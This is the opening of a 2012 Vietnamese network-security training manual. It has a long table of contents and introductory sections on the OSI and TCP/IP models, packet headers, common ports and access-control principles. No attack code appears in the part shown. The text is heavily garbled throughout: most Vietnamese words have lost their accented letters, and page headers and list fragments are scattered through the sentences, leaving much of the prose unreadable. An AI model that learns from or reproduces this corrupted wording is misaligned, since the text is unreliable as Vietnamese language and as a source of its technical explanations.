Security Toàn Tập

TOCBATDAT SECURITY TON TP
Security ton tp Version 1.2 2012
Page | 1 Copyright by Tocbatdat
Ti liu v Bo mt Version 1 2012
BNG THEO DI THAY I

Phin bn
Ngy cp nht
Ngi cp nht
Ch thch
7/2012
Hong Tun t
First Release
7, 2012
7, 2012
Mc lc ti liu
I.
MC CH V PHM VI TI LIU ............................................................................................. 9
1.
2.
Mc ch ca ti liu ......................................................................................................... 9
Phm vi ti liu .................................................................................................................. 9
II. TNG QUAN V AN NINH MNG (SECURITY OVERVIEW) .............................................. 10
1.
2.
Khi nim c bn v an ton thng tin (security). ....................................................... 11

H thng mng c bn .................................................................................................... 11
a.
M hnh mng OSI...................................................................................................................... 11
b.
M hnh mng TCP/IP ................................................................................................................ 17
c.
So snh m hnh TCP/IP v OSI ................................................................................................. 19
d.
Cu to gi tin IP, TCP,UDP, ICMP .......................................................................................... 19
e.
Mt s Port thng s dng........................................................................................................ 22
f.
S dng cng c Sniffer phn tch gi tin IP, ICMP, UDP, TCP. ......................................... 22
g.
Phn tch tng gi tin v ton phin kt ni................................................................................ 22
3.
Khi nim v iu khin truy cp (Access Controls). .................................................. 23
a.
Access Control Systems .............................................................................................................. 23
b.
Nguyn tc thit lp Access Control ........................................................................................... 24
c.
Cc dng Access Controls........................................................................................................... 24
4.
Khi nim v Authentications ........................................................................................ 27
a.
Nhng yu t nhn dng v xc thc ngi dng .................................................................. 27
b.
Cc phng thc xc thc .......................................................................................................... 27
5.
Authorization ................................................................................................................... 31
a.
C bn v Authorization ............................................................................................................. 31
b.
Cc phng thc Authorization .................................................................................................. 31
6.
7.
Khi nim v Accounting ................................................................................................ 33

Tam gic bo mt CIA .................................................................................................... 34
a.
Confidentiality ............................................................................................................................ 34
b.
Integrity ....................................................................................................................................... 35
c.
Availability ................................................................................................................................. 35
8.
Mt m hc c bn .......................................................................................................... 36
a.
Khi nim c bn v mt m hc ................................................................................................ 36
b.
Hm bm Hash ......................................................................................................................... 36
c.
M ha i xng Symmetric .................................................................................................... 37
d.
M ha bt i xng Assymmetric .......................................................................................... 37
e.
Tng quan v h thng PKI ........................................................................................................ 39
f.
Thc hnh m ha v gii m vi cng c Cryptography tools.................................................. 42
7, 2012
9. Khi nim c bn v tn cng mng .................................................................................. 42

a.
bc c bn ca mt cuc tn cng ............................................................................................ 42
b.
Mt s khi nim v bo mt. ..................................................................................................... 44
c.
Cc phng thc tn cng c bn ............................................................................................... 44
d.
ch ca cc dng tn cng......................................................................................................... 45
III. INFRASTRUCTURE SECURITY (AN NINH H TNG). ........................................................ 47
1.
3.
4.
Cc gii php v l trnh xy dng bo mt h tng mng ........................................ 48

Thit k m hnh mng an ton ..................................................................................... 50
Router v Switch ............................................................................................................. 51
a. Chc nng ca Router ..................................................................................................................... 51

b. Chc nng ca Switch..................................................................................................................... 52
c. Bo mt trn Switch ........................................................................................................................ 52
d. Bo mt trn Router ........................................................................................................................ 52
e. Thit lp bo mt cho Router .......................................................................................................... 53
5.
Firewall v Proxy ............................................................................................................ 58
a.
Khi nim Firewall ..................................................................................................................... 58
b.
Chc nng ca Firewall .............................................................................................................. 58
c.
Nguyn l hot ng ca Firewall .............................................................................................. 59
d.
Cc loi Firewall ......................................................................................................................... 60
e.
Thit k Firewall trong m hnh mng........................................................................................ 61
6.
7.
Cu hnh firewall IPtable trn Linux ............................................................................ 64

Ci t v cu hnh SQUID lm Proxy Server ............................................................. 68
a.
Linux SQUID Proxy Server: ....................................................................................................... 68
b.
Ci t: ........................................................................................................................................ 68
c.
Cu hnh Squid:........................................................................................................................... 70
d.
Khi ng Squid: ........................................................................................................................ 72
8.
Trin khai VPN trn nn tng OpenVPN ..................................................................... 74
a.
Tng quan v OpenVPN. ............................................................................................................ 74
b.
Trin khai OpenVPN vi SSL trn mi trng Ubuntu linux .................................................... 75
9.
ng dng VPN bo v h thng Wifi ............................................................................ 82
a.
Cc phng thc bo mt Wifi ................................................................................................... 82
b.
Thit lp cu hnh trn thit b Access Point v VPN Server 2003 ............................................ 83
c.
To kt ni VPN t cc thit b truy cp qua Wifi...................................................................... 95
10.
H thng pht hin v ngn chn truy cp bt hp php IDS/IPS .......................... 100
a.
Nguyn l phn tch gi tin ....................................................................................................... 100
a.
Ci t v cu hnh Snort lm IDS/IPS ..................................................................................... 104
11.
7, 2012
Ci t v cu hnh Sourcefire IPS ............................................................................. 111
a.
Tnh nng ca h thng IPS Sourcefire .................................................................................... 111
b.
M hnh trin khai in hnh h thng IDS/IPS ........................................................................ 113
c.
Nguyn l hot ng ca h thng IDS/IPS Sourcefire ............................................................ 114
d.
Thit lp cc thng s qun tr cho cc thit b Sourcefire ....................................................... 117
e.
Upgrade cho cc thit b Sourcefire .......................................................................................... 118
f.
Cu hnh cc thit lp h thng (System settings) .................................................................... 118
g.
Thit lp qun tr tp trung cho cc thit b Sourcefire ............................................................. 122
h.
Cu hnh Interface Sets v Detection Engine. ........................................................................... 124
i.
Qun tr v thit lp chnh sch cho IPS ................................................................................... 127
j.
Phn tch Event v IPS .............................................................................................................. 143
12.
Endpoint Security.......................................................................................................... 147
a.
Gii php Kaspersky Open Space Security (KOSS) ................................................................. 147
b.
Tnh nng ca gi Kaspersky Endpoint Security ...................................................................... 148
c.
Lab ci t KSC v Endpoint Security cho my trm .............................................................. 149
13.
14.
15.
Data Loss Prevent.......................................................................................................... 149

Network Access Control ............................................................................................... 151
Bo mt h iu hnh ................................................................................................... 154
a.
Bo mt cho h iu hnh Windows ......................................................................................... 154
b.
Lab: S dng Ipsec Policy bo v mt s ng dng trn Windows ..................................... 156
c.
Bo v cho h iu hnh Linux ................................................................................................. 156
16.
Chnh sch an ninh mng. ............................................................................................ 159
a.
Yu cu xy dng chnh sch an ninh mng. ............................................................................ 159
b.
Quy trnh tng quan xy dng chnh sch tng quan: .............................................................. 159
c.
H thng ISMS ......................................................................................................................... 160
d.
ISO 27000 Series ...................................................................................................................... 161
IV. AN TON NG DNG ................................................................................................................. 164
1.
Bo mt cho ng dng DNS ......................................................................................... 164
a.
S dng DNS Forwarder........................................................................................................... 164
b.
S dng my ch DNS lu tr. ................................................................................................. 165
c.
S dng DNS Advertiser .......................................................................................................... 165
d.
S dng DNS Resolver. ............................................................................................................ 166
e.
Bo v b nh m DNS .......................................................................................................... 166
f.
Bo mt kt ni bng DDNS..................................................................................................... 166
g.
Ngng chy Zone Transfer ....................................................................................................... 167
7, 2012
h. S dng Firewall kim sot truy cp DNS.................................................................................... 167

i. Ci t kim sot truy cp vo Registry ca DNS ......................................................................... 167
j. Ci t kim sot truy cp vo file h thng DNS ......................................................................... 168
2.
Bo mt cho ng dng Web ......................................................................................... 168
a. Gii thiu ..................................................................................................................................... 168

b. Cc l hng trn dch v Web ................................................................................................... 168
c. Khai thc l hng bo mt tng h iu hnh v bo mt cho my ch Web ...................... 169
d. Khai thc l hng trn Web Service ......................................................................................... 171
e. Khai thc l hng DoS trn Apache 2.0.x-2.0.64 v 2.2.x 2.2.19 ..................................... 173
f. Khai thc l hng trn Web Application .................................................................................. 173
3.
An ton dch v Mail Server ........................................................................................ 175
a. Gii thiu tng quan v SMTP, POP, IMAP ................................................................................ 175

b. Cc nguy c b tn cng khi s dng Email ...................................................................................................... 185
4.
5.
V.
Bo mt truy cp t xa ................................................................................................. 187

L hng bo mt Buffer overflow v cch phng chng ........................................... 187
a.
L thuyt ................................................................................................................................... 187
b.
M t k thut .......................................................................................................................... 188
c.
V d c bn ............................................................................................................................. 188
d.
Trn b nh m trn stack ..................................................................................................... 188
e.
M ngun v d ........................................................................................................................ 189
f.
Khai thc ................................................................................................................................... 190
g.
Chng trn b m ................................................................................................................... 191
h.
Thc hnh: ................................................................................................................................ 194
AN TON D LIU ...................................................................................................................... 194
1. An ton c s d liu .......................................................................................................... 194

a.
S vi phm an ton c s d liu. ............................................................................................ 195
b.
Cc mc an ton c s d liu............................................................................................ 195
c.
Nhng quyn hn khi s dng h c s d liu. ....................................................................... 196
d.
Khung nhn mt c ch bo v ................................................................................................ 197
e.
Cp php cc quyn truy nhp .................................................................................................. 198
f.
Kim tra du vt ........................................................................................................................ 201
2. Gim st thng k c s d liu ........................................................................................ 201

3. Phng thc an ton c s d liu.................................................................................... 208
VI. CC CNG C NH GI V PHN TCH MNG ............................................................. 212
1.
K nng Scan Open Port .............................................................................................. 212
a. Nguyn tc truyn thng tin TCP/IP ............................................................................................. 212
7, 2012
b. Nguyn tc Scan Port trn mt h thng. ..................................................................................... 214

c. Scan Port vi Nmap. ..................................................................................................................... 216
2.
Scan l hng bo mt trn OS ...................................................................................... 219
a.
S dng Nmap Scan l hng bo mt ca OS ..................................................................... 219
b.
S dng Nessus Scan l hng bo mt ca OS .................................................................... 220
c.
S dng GFI Scan l hng bo mt ca OS ......................................................................... 228
3.
Scan l hng bo mt trn Web ................................................................................... 231
a.
S dng Acunetix scan l hng bo mt trn Web .............................................................. 232
b.
Lab S dng IBM App Scan Scan l hng bo mt trn Web ............................................. 234
4.
K thut phn tch gi tin v nghe nn trn mng..................................................... 234
a.
Bn cht ca Sniffer .................................................................................................................. 234
b.
M hnh phn tch d liu chuyn nghip cho doanh nghip ................................................... 235
c.
Mi trng Hub ........................................................................................................................ 236
d.
K thut Sniffer trong mi trng Switch ................................................................................ 236
e.
M hnh Sniffer s dng cng c h tr ARP Attack ............................................................... 239
5.
Cng c khai thc l hng Metasploit ......................................................................... 240
a.
Gii thiu tng quan v cng c Metasploit ............................................................................. 240
b.
S dng Metasploit Farmwork ................................................................................................. 242
c.
Kt lun ..................................................................................................................................... 248
6.
S dng Wireshark v Colasoft phn tch gi tin ................................................. 248
d.
S dng Wireshark phn tch gi tin v traffic ca h thng mng ..................................... 248
e.
S dng Colasoft phn tch traffic ca h thng mng ........................................................ 252
VII. KT LUN ...................................................................................................................................... 259
Bng cc thut ng s dng trong ti liu

STT
Thut ng
Vit y
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ATTT
Security
An ton thng tin

Bo Mt
Mt vi thng tin
7, 2012
I.
7, 2012
MC CH V PHM VI TI LIU
1. Mc ch ca ti liu
L ti liu o to v An ton thng tin cho cc cn b vn hnh v qun tr mng ca
ABC.Cung cp y cho hc vin cc khi nim, m hnh h thng, cu hnh trin
khai cc gii php, qun l ri ro v nhiu kin thc khc v An ton thng tin.
2. Phm vi ti liu
L ti liu c vit ring cho kha hc An ton thng tin cho cc cn b ca ABC
II.
TNG QUAN V AN NINH MNG (SECURITY OVERVIEW)

1.
Khi nim c bn v an ton thng tin (security).
2.
H thng mng c bn
3.
Khi nim v iu khin truy cp (Access Controls).
4.
Khi nim v Authentications
5.
Authorization
6.
Khi nim v Accounting
7.
Tam gic bo mt CIA
8.
Mt m hc c bn
9. Khi nim c bn v tn cng mng
7, 2012
7, 2012
1. Khi nim c bn v an ton thng tin (security).

Mt s t chc ln trn th gii a ra cc khi nim v Security Bo Mt hay An
ton thng tin nh sau:
-
Bo mt hay an ton thng tin l mc bo v thng tin trc cc mi e ra v

thng tn l, thng tin khng cn ton vn v thng tin khng sn sng.
Bo mt hay an ton thng tin l mc bo v chng li cc nguy c v mt an ton

thng tin nh nguy him, thit hi, mt mt v cc ti phm khc. Bo mt nh
l hnh thc v mc bo v thng tin bao gm cu trc v qu trnh x l
nng cao bo mt.
T chc Institute for Security and Open Methodologies nh ngha Security l hnh
thc bo v, ni tch bit gia ti nguyn v nhng mi e ra.
2. H thng mng c bn
a. M hnh mng OSI
Khi mt ng dng hay mt dch v hot ng phc v cc nhu cu trao i thng tin
ca ngi dng, h thng mng s hot ng vic trao i thng tin c din ra
vi nhng quy tc ring.
Khi nhn vo si dy mng hay cc thit b khng dy con ngi s khng th hiu
c nhng nguyn tc truyn thng tin . d dng hiu cc nguyn tc, nguyn l
phc ph qu trnh nghin cu, pht trin ng dng cng nh khc phc s c mng t
chc tiu chun th gii dng m hnh OSI nh l mt tiu chun ISO.
M hnh OSI (Open Systems Interconnection Reference Model, vit ngn l OSI
Model hoc OSI Reference Model) - tm dch l M hnh tham chiu kt ni cc h
thng m - l mt thit k da vo nguyn l tng cp, l gii mt cch tru tng k
thut kt ni truyn thng gia cc my vi tnh v thit k giao thc mng gia chng.
M hnh ny c pht trin thnh mt phn trong k hoch Kt ni cc h thng m
(Open Systems Interconnection) do ISO v IUT-T khi xng. N cn c gi l M
hnh by tng ca OSI. (Ngun Wikipedia).
7, 2012
Mc ch ca m hnh OSI:
M hnh OSI phn chia chc nng ca mt giao thc ra thnh mt chui cc tng cp.
Mi mt tng cp c mt c tnh l n ch s dng chc nng ca tng di n, ng
thi ch cho php tng trn s dng cc chc nng ca mnh. Mt h thng ci t cc
giao thc bao gm mt chui cc tng ni trn c gi l "chng giao thc" (protocol
stack). Chng giao thc c th c ci t trn phn cng, hoc phn mm, hoc l t
hp ca c hai. Thng thng th ch c nhng tng thp hn l c ci t trong
phn cng, cn nhng tng khc c ci t trong phn mm.
M hnh OSI ny ch c ngnh cng nghip mng v cng ngh thng tin tn trng
mt cch tng i. Tnh nng chnh ca n l quy nh v giao din gia cc tng cp,
tc qui nh c t v phng php cc tng lin lc vi nhau. iu ny c ngha l cho
d cc tng cp c son tho v thit k bi cc nh sn xut, hoc cng ty, khc
nhau nhng khi c lp rp li, chng s lm vic mt cch dung ha (vi gi thit l
cc c t c thu o mt cch ng n). Trong cng ng TCP/IP, cc c t ny
thng c bit n vi ci tn RFC (Requests for Comments, dch st l " ngh
duyt tho v bnh lun"). Trong cng ng OSI, chng l cc tiu chun ISO (ISO
standards).
Thng th nhng phn thc thi ca giao thc s c sp xp theo tng cp, tng t
nh c t ca giao thc ra, song bn cnh , c nhng trng hp ngoi l, cn
c gi l "ng ct ngn" (fast path). Trong kin to "ng ct ngn", cc giao
dch thng dng nht, m h thng cho php, c ci t nh mt thnh phn n,
trong tnh nng ca nhiu tng c gp li lm mt.
Vic phn chia hp l cc chc nng ca giao thc khin vic suy xt v chc nng v
hot ng ca cc chng giao thc d dng hn, t to iu kin cho vic thit k
cc chng giao thc t m, chi tit, song c tin cy cao. Mi tng cp thi hnh v
cung cp cc dch v cho tng ngay trn n, ng thi i hi dch v ca tng ngay
di n. Nh ni trn, mt thc thi bao gm nhiu tng cp trong m hnh OSI,
thng c gi l mt "chng giao thc" (v d nh chng giao thc TCP/IP).
M hnh tham chiu OSI l mt cu trc ph h c 7 tng, n xc nh cc yu cu cho
s giao tip gia hai my tnh. M hnh ny c nh ngha bi T chc tiu chun
ho quc t (International Organization for Standardization) trong tiu chun s 7498-1
7, 2012
(ISO standard 7498-1). Mc ch ca m hnh l cho php s tng giao

(interoperability) gia cc h my (platform) a dng c cung cp bi cc nh sn
xut khc nhau. M hnh cho php tt c cc thnh phn ca mng hot ng ha ng,
bt k thnh phn y do ai to dng. Vo nhng nm cui thp nin 1980, ISO tin
c vic thc thi m hnh OSI nh mt tiu chun mng.
Ti thi im , TCP/IP c s dng ph bin trong nhiu nm. TCP/IP l nn
tng ca ARPANET, v cc mng khc - l nhng ci c tin ha v tr thnh
Internet. (Xin xem thm RFC 871 bit c s khc bit ch yu gia TCP/IP v
ARPANET.)
Hin nay ch c mt phn ca m hnh OSI c s dng. Nhiu ngi tin rng i b
phn cc c t ca OSI qu phc tp v vic ci t y cc chc nng ca n s
i hi mt lng thi gian qu di, cho d c nhiu ngi nhit tnh ng h m hnh
OSI i chng na.
Chi tit cc tng ca m hnh OSI:
Tng 1: Tng vt l:
Tng vt l nh ngha tt c cc c t
v in v vt l cho cc thit b.
Trong bao gm b tr ca cc chn
cm (pin), cc hiu in th, v cc
c t v cp ni (cable). Cc thit b
tng vt l bao gm Hub, b lp
(repeater), thit b tip hp mng
(network adapter) v thit b tip hp
knh my ch (Host Bus Adapter)(HBA dng trong mng lu tr
(Storage Area Network)). Chc nng
v dch v cn bn c thc hin bi
tng vt l bao gm:
Thit lp hoc ngt mch kt ni in
7, 2012
(electrical connection) vi mt [[mi trng truyn dnphng tintruyn thng

(transmission medium).
Tham gia vo quy trnh m trong cc ti nguyn truyn thng c chia s hiu qu
gia nhiu ngi dng. Chng hn gii quyt tranh chp ti nguyn (contention) v
iu khin lu lng.
iu bin (modulation), hoc bin i gia biu din d liu s (digital data) ca cc
thit b ngi dng v cc tn hiu tng ng c truyn qua knh truyn thng
(communication channel).
Cp (bus) SCSI song song hot ng tng cp ny. Nhiu tiu chun khc nhau ca
Ethernet dnh cho tng vt l cng nm trong tng ny; Ethernet nhp tng vt l vi
tng lin kt d liu vo lm mt. iu tng t cng xy ra i vi cc mng cc b
nh Token ring, FDDI v IEEE 802.11.]]
Tng 2: Tng lin kt d liu (Data Link Layer)
Tng lin kt d liu cung cp cc phng tin c tnh chc nng v quy trnh
truyn d liu gia cc thc th mng, pht hin v c th sa cha cc li trong tng
vt l nu c. Cch nh a ch mang tnh vt l, ngha l a ch (a ch MAC) c
m ha cng vo trong cc th mng (network card) khi chng c sn xut. H thng
xc nh a ch ny khng c ng cp (flat scheme). Ch : V d in hnh nht l
Ethernet. Nhng v d khc v cc giao thc lin kt d liu (data link protocol) l cc
giao thc HDLC; ADCCP dnh cho cc mng im-ti-im hoc mng chuyn mch
gi (packet-switched networks) v giao thc Aloha cho cc mng cc b. Trong cc
mng cc b theo tiu chun IEEE 802, v mt s mng theo tiu chun khc, chng
hn FDDI, tng lin kt d liu c th c chia ra thnh 2 tng con: tng MAC
(Media Access Control - iu khin Truy nhp ng truyn) v tng LLC (Logical
Link Control - iu khin Lin kt Lgic) theo tiu chun IEEE 802.2.
Tng lin kt d liu chnh l ni cc cu ni (bridge) v cc thit b chuyn mch
(switches) hot ng. Kt ni ch c cung cp gia cc nt mng c ni vi nhau
trong ni b mng. Tuy nhin, c lp lun kh hp l cho rng thc ra cc thit b ny
thuc v tng 2,5 ch khng hon ton thuc v tng 2.
7, 2012
Tng 3: Tng mng (Network Layer)

Tng mng cung cp cc chc nng v qui trnh cho vic truyn cc chui d liu c
di a dng, t mt ngun ti mt ch, thng qua mt hoc nhiu mng, trong khi vn
duy tr cht lng dch v (quality of service) m tng giao vn yu cu. Tng mng
thc hin chc nng nh tuyn, .Cc thit b nh tuyn (router) hot ng ti tng ny
gi d liu ra khp mng m rng, lm cho lin mng tr nn kh thi (cn c thit
b chuyn mch (switch) tng 3, cn gi l chuyn mch IP). y l mt h thng nh
v a ch lgic (logical addressing scheme) cc gi tr c chn bi k s mng. H
thng ny c cu trc ph h. V d in hnh ca giao thc tng 3 l giao thc IP.
Tng 4: Tng giao vn (Transport Layer)
Tng giao vn cung cp dch v chuyn dng chuyn d liu gia cc ngi dng ti
u cui, nh cc tng trn khng phi quan tm n vic cung cp dch v truyn
d liu ng tin cy v hiu qu. Tng giao vn kim sot tin cy ca mt kt ni
c cho trc. Mt s giao thc c nh hng trng thi v kt ni (state and
connection orientated). C ngha l tng giao vn c th theo di cc gi tin v truyn
li cc gi b tht bi. Mt v d in hnh ca giao thc tng 4 l TCP. Tng ny l ni
cc thng ip c chuyn sang thnh cc gi tin TCP hoc UDP. tng 4 a ch
c nh l address ports, thng qua address ports phn bit c ng dng trao
i.
Tng 5: Tng phin (Session layer)
Tng phin kim sot cc (phin) hi thoi gia cc my tnh. Tng ny thit lp, qun
l v kt thc cc kt ni gia trnh ng dng a phng v trnh ng dng xa. Tng
ny cn h tr hot ng song cng (duplex) hoc bn song cng (half-duplex) hoc
n cng (Single) v thit lp cc qui trnh nh du im hon thnh (checkpointing) gip vic phc hi truyn thng nhanh hn khi c li xy ra, v im hon thnh
c nh du - tr hon (adjournment), kt thc (termination) v khi ng li
(restart). M hnh OSI u nhim cho tng ny trch nhim "ngt mch nh nhng"
(graceful close) cc phin giao dch (mt tnh cht ca giao thc kim sot giao vn
TCP) v trch nhim kim tra v phc hi phin, y l phn thng khng c dng
n trong b giao thc TCP/IP.
7, 2012
Tng 6: Tng trnh din (Presentation layer)

Lp trnh din hot ng nh tng d liu trn mng. lp ny trn my tnh truyn d
liu lm nhim v dch d liu c gi t tng Application sang dng Fomat chung.
V ti my tnh nhn, lp ny li chuyn t Fomat chung sang nh dng ca tng
Application. Lp th hin thc hin cc chc nng sau: - Dch cc m k t t ASCII
sang EBCDIC. - Chuyn i d liu, v d t s interger sang s du phy ng. - Nn
d liu gim lng d liu truyn trn mng. - M ho v gii m d liu m
bo s bo mt trn mng.
Tng 7: Tng ng dng (Application layer)
Tng ng dng l tng gn vi ngi s dng nht. N cung cp phng tin cho
ngi dng truy nhp cc thng tin v d liu trn mng thng qua chng trnh ng
dng. Tng ny l giao din chnh ngi dng tng tc vi chng trnh ng dng,
v qua vi mng. Mt s v d v cc ng dng trong tng ny bao gm Telnet,
Giao thc truyn tp tin FTP v Giao thc truyn th in t SMTP, HTTP, X.400
Mail remote
M hnh m t d hiu m hnh OSI vi cc hnh thc trao i thng tin thc t:
7, 2012
b. M hnh mng TCP/IP

TCP/IP (ting Anh: Internet protocol suite hoc IP suite hoc TCP/IP protocol suite b giao thc lin mng), l mt b cc giao thc truyn thng ci t chng giao thc
m Internet v hu ht cc mng my tnh thng mi ang chy trn . B giao thc
ny c t tn theo hai giao thc chnh ca n l TCP (Giao thc iu khin Giao
vn) v IP (Giao thc Lin mng). Chng cng l hai giao thc u tin c nh
ngha.
Nh nhiu b giao thc khc, b giao thc TCP/IP c th c coi l mt tp hp cc
tng, mi tng gii quyt mt tp cc vn c lin quan n vic truyn d liu, v
cung cp cho cc giao thc tng cp trn mt dch v c nh ngha r rng da trn
vic s dng cc dch v ca cc tng thp hn. V mt lgic, cc tng trn gn vi
ngi dng hn v lm vic vi d liu tru tng hn, chng da vo cc giao thc
tng cp di bin i d liu thnh cc dng m cui cng c th c truyn i
mt cch vt l.
7, 2012
M hnh OSI miu t mt tp c nh gm 7 tng m mt s nh sn xut la chn v

n c th c so snh tng i vi b giao thc TCP/IP. S so snh ny c th gy
nhm ln hoc mang li s hiu bit su hn v b giao thc TCP/IP.
Tng ng dng:
Gm cc ng dng: DNS, TFTP,
TLS/SSL, FTP, HTTP, IMAP, IRC,
NNTP, POP3, SIP, SMTP, SNMP,
SSH, TELNET, ECHO, BitTorrent,
RTP, PNRP, rlogin, ENRP,
Cc giao thc nh tuyn nh BGP v
RIP, v mt s l do, chy trn TCP
v UDP - theo th t tng cp: BGP
dng TCP, RIP dng UDP - cn c
th c coi l mt phn ca tng ng
dng hoc tng mng.
Tng giao vn:
Gm cc giao thc:TCP, UDP,
DCCP, SCTP, IL, RUDP,
Cc giao thc nh tuyn nh OSPF (tuyn ngn nht c chn u tin), chy trn
IP, cng c th c coi l mt phn ca tng giao vn, hoc tng mng. ICMP
(Internet control message protocol| - tm dch l Giao thc iu khin thng ip
Internet) v IGMP (Internet group management protocol - tm dch l Giao thc qun
l nhm Internet) chy trn IP, c th c coi l mt phn ca tng mng.
Tng mng:
Giao thc: IP (IPv4, IPv6) ARP (Address Resolution Protocol| - tm dch l Giao thc
tm a ch) v RARP (Reverse Address Resolution Protocol - tm dch l Giao thc
tm a ch ngc li) hot ng bn di IP nhng trn tng lin kt (link layer),
vy c th ni l n nm khong trung gian gia hai tng.
7, 2012
Tng lin kt:

Gm cc giao thc: Ethernet, Wi-Fi, Token ring, PPP, SLIP, FDDI, ATM, Frame
Relay, SMDS,
c. So snh m hnh TCP/IP v OSI

M hnh n gin hn m hnh OSI vn th hin c qu trnh giao tip trn mng.
M hnh TCP/IP c chia lm 4 Layer
OSI Model
7. Application
6. Presentation
5. Session
4. Transport
3. Network
2. Data Link
1. Physical
TCP/IP Model
4. Application
3. Transport
2. Internet
1. Network Access
d. Cu to gi tin IP, TCP,UDP, ICMP

phc v cng tc nghin cu v Security cn phi hiu r cu to gi tin cc layer
c th hiu v phn tch gi tin.
M hnh ng gi thng tin cc Layer ca m hnh TCP/IP
Cu to gi tin IPv4
y l cu to ca gi
tin IPv4, gm phn
Header v data. Header
bao gm 160 hoc 192
bits phn cn li l Data.
Phn a ch l 32bits
Cu to gi tin IPv6:
Gi tin IPv6 cng gm hai
phn l Hearder v Data.
Phn Header ca gi tin
bao
gm
40
octec
(320bits), trong a ch
IPv6 l 128bit.
Cu to ca gi tin TCP:
7, 2012
7, 2012
Cu to ca gi tin TCP bao gm hai phn Header v Data. Trong phn Header l
192bit.
Ba bc bt u kt ni TCP:
+ Bc I: Client bn n Server mt gi
tin SYN
+ Bc II: Server tr li ti Client mt
gi tin SYN/ACK
+ Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK v
qu trnh trao i thng tin gia hai my bt u.
Bn bc kt thc kt ni TCP:
+ Bc I: Client gi n Server mt gi tin
FIN ACK
+ Bc II: Server gi li cho Client mt gi
tin ACK
+ Bc III: Server li gi cho Client mt gi FIN ACK
+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v
Client c thc hin.
Cu to gi tin UDP:
G
i
t
i
UDP bao gm hai phn Header v Data, trong phn Header gm 64bit.
7, 2012
Cu to gi tin ICMP
Type (8 bits) [8 bt s dng nhn din loi ICMP]
Code (8 bits) [Mi Type c th c nhng code c th ring miu t cho dng
]
Checksum (16 bits) [Checksum gm 16bits]
Message (Khng c nh) [Ph thuc vo type v code]
e. Mt s Port thng s dng

nhiu dch v c th cng lc giao tip trn mt kt ni, mi dch v c s dng
mt port nht nh. Khi nghin cu v Security chng ta cng nn c mt s kin thc
v cc port hay c s dng:
Protocol
FTP
SSH
Telnet
SMTP
DNS
TFTP
HTTP
POP3
SNMP
HTTPS
SMB
NetBIOS
VPN
Remote Desktop
Port
20/21
22
23
25
53
69
80
110
161/162
443
445
135,137,139
1723,500
3389
f. S dng cng c Sniffer phn tch gi tin IP, ICMP, UDP, TCP.
Thc hnh: Ci t Wireshark v Colasoft phn tch
g. Phn tch tng gi tin v ton phin kt ni

Thc hnh: Ci t Wireshark v Colasoft phn tch
7, 2012
3. Khi nim v iu khin truy cp (Access Controls).

Trc khi c cp thm quyn mi ngi u truy cp vi quyn user Anonymouse.
Sau khi ngi dng c xc thc (Authentication) s c h thng cp cho thm
quyn s dng ti nguyn (Authorization) v ton b qu trnh truy cp ca ngi
dng s c gim st v ghi li (Accounting).
a. Access Control Systems

Ti nguyn ch c th truy cp bi nhng c nhn c xc thc. Qu trnh qun l
truy cp ti nguyn ca ngi dng cn thc hin qua cc bc:
-
Identification: Qu trnh nhn dng ngi dng, ngi dng cung cp cc thng tin
cho h thng nhn dng.
Authentication: Bc xc thc ngi dng, ngi dng cung cp cc thng tin xc

nhn dng, h thng tin hnh xc thc bng nhiu phng thc khc nhau.
Authorization:Thm quyn truy cp ti nguyn c h thng cp cho ngi dng sau

khi xc thc Authentication.
Accounting: H thng gim st v thng k qu trnh truy cp ca ngi dng vo cc

vng ti nguyn.
Tt c cc h thng iu khin truy cp (access control systems) u phi c ba yu t
c bn nht:
Subjects: Ton b i tng c th gn quyn truy cp. C th coi y l User/Group

trong h thng
Objects: Ti nguyn c s dng.
Access Permissions c s dng gn quyn truy cp cc Objects cho Subjects. (V

d mt User l mt Subject, mt foder l mt Object, Permission l quyn gn cho User
truy cp vo Folder). Bng Access Permissions cho mt i tng gi l Access
Control List (ACLs), ACL ca ton b h thng c thng k trong bng Access
Control Entries (ACEs).
7, 2012
b. Nguyn tc thit lp Access Control

Ngi lm v chnh sch bo mt cn phi a ra cc nguyn tc qun tr ti nguyn h
thng m bo: Bo mt nht cho ti nguyn, p ng c cng vic ca ngi
dng. Cc nguyn tc c chia ra:
-
Principle of Least Privilege Ngi dng (Subjects) c gn quyn nh nht

(minimum permissions) vi cc ti nguyn (Object) v vn m bo c cng vic.
Principle of Separation of Duties and Responsibilities Cc h thng quan trng cn

phi phn chia thnh cc thnh phn khc nhau d dng phn quyn iu khin hp
l.
Principle of Need to Know Ngi dng ch truy cp vo nhng vng ti nguyn m

h cn v c hiu bit v ti nguyn m bo cho cng vic ca h.
c. Cc dng Access Controls

Ti nguyn c nhiu dng, ngi dng c nhiu i tng vy chng ta cn phi s
dng nhng dng iu khin truy cp d liu hp l.
-
Mandatory Access Control (MAC)

+ L phng thc iu khin da vo Rule-Base gn quyn truy cp cho cc i
tng.
+ Vic gn quyn cho cc i tng da vo vic phn chia ti nguyn ra cc loi
khc nhau (classification resources).
+ Phng thc iu khin truy cp ny thng p dng cho: t chc chnh ph,
cng ty
+ V d: mt cng ty sn xut bia cc vng ti nguyn c chia: Public (website),
Private (d liu k ton), Confidential (cng thc nu bia). Mi vng ti nguyn
s c nhng i tng c truy cp ring, v vic iu khin truy cp ny chnh l
Mandatory Access Control.
7, 2012
Discretionary Access Control (DAC)

+ Ngi dng (Subjects) c iu khin
truy cp qua ACLs.
+ Cc mc truy cp vo d liu c th
c phn lm cc mc khc nhau (v d:
NTFS Permission, vic gn quyn cho
User/Group theo cc mc nh Full
control, Modify, Read).
+ Access Control List c th c s
dng khi gn Permission truy cp ti
nguyn, hoc trn router, firewall. Khi s
dng ACLs l phng thc iu khin
truy cp Discretionary Access Control.
bng Access Control List ca NTFS

Permission
7, 2012
Role-Base Access Control

+ Ngi qun tr s da vo vai tr ca ngi dng gn quyn cho ngi dng.
Nhng quyn ca ngi dng c th l nhng tc v ngi dng c th thc thi vi
h thng.
+ V d ngi qun tr c th gn cc quyn cho User: Shutdown, change network
setings, remote desktop, backup v mt s quyn khc da vo vai tr (role) ca
ngi dng.
+ Trong h thng Windows ca Microsoft phng thc iu khin truy cp ny c
th hiu l gn User Rights.
+ V d thit lp User Right ca h thng Microsoft.
Ngoi ra Access Control c th c chia lm hai dng:

-
Centralized Access Control (CAC)
7, 2012
Qu trnh xc thc v cp thm quyn c thc hin tp trung cho ton b h

thng. C ba phng thc iu khin truy cp tp trung thng c s dng l:
